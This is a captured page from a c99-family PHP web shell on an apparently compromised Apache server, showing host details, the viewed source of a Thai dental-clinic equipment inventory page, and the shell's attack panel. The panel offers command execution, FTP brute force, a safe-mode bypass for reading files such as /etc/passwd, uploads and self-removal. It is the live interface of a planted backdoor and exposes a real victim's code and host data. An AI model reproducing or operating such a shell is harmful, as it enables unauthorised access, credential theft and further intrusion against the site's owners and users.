!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/manage_depart/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     UnitBynameOne.php (15.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    session_start
();
    
    
/**  Define Validate Access  */
    
define'_VALID_ACCESS');

    
/**  Check Session User Login  */
    
if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) {
        echo 
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
        echo 
"<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
        echo 
"<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
        exit();
    } 
    else {
        
/**  Configuration  */
        
require_once( "../configuration.php" );
        require_once( 
$_Config_absolute_path "/includes/framework.php" );
    
        
/**  Create Database Object  */
        
$dbObj = new DBConn;
        
    
/**  Config Table for This Page  */
    
$myTable "faculty_tb";
    
$myTableFK "Faculty_code";
    
$myTable1 " accessories_tb";
    
    
$query " SELECT *  FROM $myTable   Where   FacultyStatus ='Y'   ";
    
$result $dbObj->execQuery($query);
    
$numrows $dbObj->_numrows;

    
$param "";
    
            
    } 
# else
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<title><?=$_Config_sitename;?> - ข้อมูลครุภัณฑ์ - ฐานข้อมูลครุภัณฑ์ จำแนกหน่วยงาน</title>
<script type="text/javascript" src="../js/utilities.js"></script>
<script language="Javascript" src="../charts/charts.js"></script>
<link href="../css/default.css" rel="stylesheet" type="text/css" />
</head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">
<?php
    
include("../templates/incHeaderDura.php");
?>
<table width="1003" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="185" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include("./_incMainMenu.php");?></td>
    <td width="818" height="300" align="left" valign="top" style="padding:10px 0px 5px 10px"><fieldset> <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="index.php">หน้าหลัก</a></font><img src="../picture/ico3.gif" width="10" height="10" align="absmiddle" border="0" /><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="Menu_acc.php">ข้อมูลทั่วไป</a></font><img src="../picture/ico3.gif" width="10" height="10" align="absmiddle" border="0" /><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="UnitBynameTow.php">คลินิกปฏิบัติงานทันตกรรม ๒</a></font><img src="../picture/ico3.gif" width="10" height="10" align="absmiddle" border="0" /><span class="NOTE"><strong>คลินิกปฏิบัติงานทันตกรรม ๑</strong></a></font></span></legend><table width="769" height="224" border="0" cellpadding="0" cellspacing="0">
     <form id="myForm" name="myForm" method="post" action="<?=$PHP_SELF;?>?page=<?=$page;?>&amp;<?=$param;?>">
      <tr>
        <td height="5"></td>
      </tr>
      <tr>
        <td align="left"><span class="PADDING-TOP-10"><img src="../images/icons/arrow-circle-225-left.png" width="16" height="16" border="0" align="absmiddle" /> <a href="javascript:;" onclick="window.history.back();"><strong>&lsaquo; ย้อนกลับ</strong></a></span></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td><img src="../images/Unit-new1.jpg" width="770" height="559" border="0" usemap="#Map" /></td>
      </tr>
      <tr>
        <td align="center" valign="top">
        <tr></tr></form>
    </table>
    </fieldset></td>
  </tr>
</table>
<?php include( "./templates/incFooter.php" ); ?>

<map name="Map" id="Map">
  <area shape="rect" coords="261,68,299,106" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=32','Detail','650','550','yes');" />
  <area shape="rect" coords="259,132,299,169" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=31','Detail','650','550','yes');" />
  <area shape="rect" coords="199,128,238,173" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=25','Detail','650','550','yes');" />
  <area shape="rect" coords="138,129,179,170" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=19','Detail','650','550','yes');" />
  <area shape="rect" coords="77,129,117,172" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=13','Detail','650','550','yes');" />
  <area shape="rect" coords="17,128,59,169" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=7','Detail','650','550','yes');" />
  <area shape="rect" coords="77,67,116,108" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=14','Detail','650','550','yes');" />
  <area shape="rect" coords="17,66,58,111" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=8','Detail','650','550','yes');" />
  <area shape="rect" coords="198,69,242,108" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=26','Detail','650','550','yes');" />
  <area shape="rect" coords="138,69,179,111" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=20','Detail','650','550','yes');" />
  <area shape="rect" coords="16,192,58,230" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=6','Detail','650','550','yes');" />
  <area shape="rect" coords="15,253,57,293" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=5','Detail','650','550','yes');" />
  <area shape="rect" coords="78,254,119,293" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=12','Detail','650','550','yes');" />
  <area shape="rect" coords="137,254,179,289" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=18','Detail','650','550','yes');" />
  <area shape="rect" coords="200,253,238,290" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=24','Detail','650','550','yes');" />
  <area shape="rect" coords="260,253,302,291" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=30','Detail','650','550','yes');" />
  <area shape="rect" coords="16,313,55,351" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=4','Detail','650','550','yes');" />
  <area shape="rect" coords="79,312,118,351" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=11','Detail','650','550','yes');" />
  <area shape="rect" coords="201,313,239,352" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=23','Detail','650','550','yes');" />
  <area shape="rect" coords="263,312,299,352" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=29','Detail','650','550','yes');" />
  <area shape="rect" coords="330,315,368,349" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=35','Detail','650','550','yes');" />
  <area shape="rect" coords="401,316,439,349" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=38','Detail','650','550','yes');" />
  <area shape="rect" coords="19,374,55,411" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=3','Detail','650','550','yes');" />
  <area shape="rect" coords="80,375,114,411" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=10','Detail','650','550','yes');" />
  <area shape="rect" coords="140,373,179,409" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=16','Detail','650','550','yes');" />
  <area shape="rect" coords="202,376,239,411" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=22','Detail','650','550','yes');" />
  <area shape="rect" coords="263,374,300,411" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=28','Detail','650','550','yes');" />
  <area shape="rect" coords="333,372,367,409" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=34','Detail','650','550','yes');" />
  <area shape="rect" coords="403,371,438,412" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=37','Detail','650','550','yes');" />
  <area shape="rect" coords="17,433,55,472" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=2','Detail','650','550','yes');" />
  <area shape="rect" coords="80,436,116,473" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=9','Detail','650','550','yes');" />
  <area shape="rect" coords="138,436,178,474" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=15','Detail','650','550','yes');" />
  <area shape="rect" coords="202,435,239,474" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=21','Detail','650','550','yes');" />
  <area shape="rect" coords="262,434,301,476" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=27','Detail','650','550','yes');" />
  <area shape="rect" coords="331,436,368,473" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=33','Detail','650','550','yes');" />
  <area shape="rect" coords="401,434,436,476" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=36','Detail','650','550','yes');" />
  <area shape="rect" coords="17,495,55,535" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=1','Detail','650','550','yes');" />
  <area shape="rect" coords="137,314,178,352" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=17','Detail','650','550','yes');" />
  <area shape="rect" coords="465,71,501,105" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=44','Detail','650','550','yes');" />
  <area shape="rect" coords="526,71,562,108" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=50','Detail','650','550','yes');" />
  <area shape="rect" coords="598,73,632,106" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=56','Detail','650','550','yes');" />
  <area shape="rect" coords="662,70,697,109" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=62','Detail','650','550','yes');" />
  <area shape="rect" coords="723,71,760,109" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=70','Detail','650','550','yes');" />
  <area shape="rect" coords="466,131,502,168" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=43','Detail','650','550','yes');" />
  <area shape="rect" coords="525,131,561,171" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=49','Detail','650','550','yes');" />
  <area shape="rect" coords="594,131,633,168" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=55','Detail','650','550','yes');" />
  <area shape="rect" coords="658,132,696,168" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=61','Detail','650','550','yes');" />
  <area shape="rect" coords="719,132,760,168" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=69','Detail','650','550','yes');" />
  <area shape="rect" coords="720,187,760,225" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=68','Detail','650','550','yes');" />
  <area shape="rect" coords="464,252,500,288" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=42','Detail','650','550','yes');" />
  <area shape="rect" coords="524,253,565,292" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=48','Detail','650','550','yes');" />
  <area shape="rect" coords="593,253,630,293" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=54','Detail','650','550','yes');" />
  <area shape="rect" coords="657,251,696,292" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=60','Detail','650','550','yes');" />
  <area shape="rect" coords="721,252,759,290" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=67','Detail','650','550','yes');" />
  <area shape="rect" coords="465,312,503,351" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=41','Detail','650','550','yes');" />
  <area shape="rect" coords="522,314,562,354" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=47','Detail','650','550','yes');" />
  <area shape="rect" coords="595,313,635,352" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=53','Detail','650','550','yes');" />
  <area shape="rect" coords="657,313,697,353" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=59','Detail','650','550','yes');" />
  <area shape="rect" coords="720,312,759,351" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=66','Detail','650','550','yes');" />
  <area shape="rect" coords="465,373,504,411" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=40','Detail','650','550','yes');" />
  <area shape="rect" coords="524,374,564,414" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=46','Detail','650','550','yes');" />
  <area shape="rect" coords="595,374,632,410" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=52','Detail','650','550','yes');" />
  <area shape="rect" coords="661,374,699,413" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=58','Detail','650','550','yes');" />
  <area shape="rect" coords="720,375,757,413" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=65','Detail','650','550','yes');" />
  <area shape="rect" coords="464,437,502,474" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=39','Detail','650','550','yes');" />
  <area shape="rect" coords="525,438,564,475" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=45','Detail','650','550','yes');" />
  <area shape="rect" coords="595,437,634,473" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=51','Detail','650','550','yes');" />
  <area shape="rect" coords="661,435,697,471" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=57','Detail','650','550','yes');" />
  <area shape="rect" coords="720,434,757,474" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=64','Detail','650','550','yes');" />
  <area shape="rect" coords="721,496,759,534" href="javascript:;" onclick="NewWindow('UnitDetail.php?Flag=1&Acc_type_code=6&No=63','Detail','650','550','yes');" />
</map>
</body>
</html>
<?php include("../templates/incFooter.php"); ?>
<?php
    
/**  Free Resource */
    
$dbObj->freeresult($result);

    
/**  Close the Database  */
    
$dbObj->disconn();
    
    
/**  Unset Class  */
    
unset($dbObj);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0167 ]--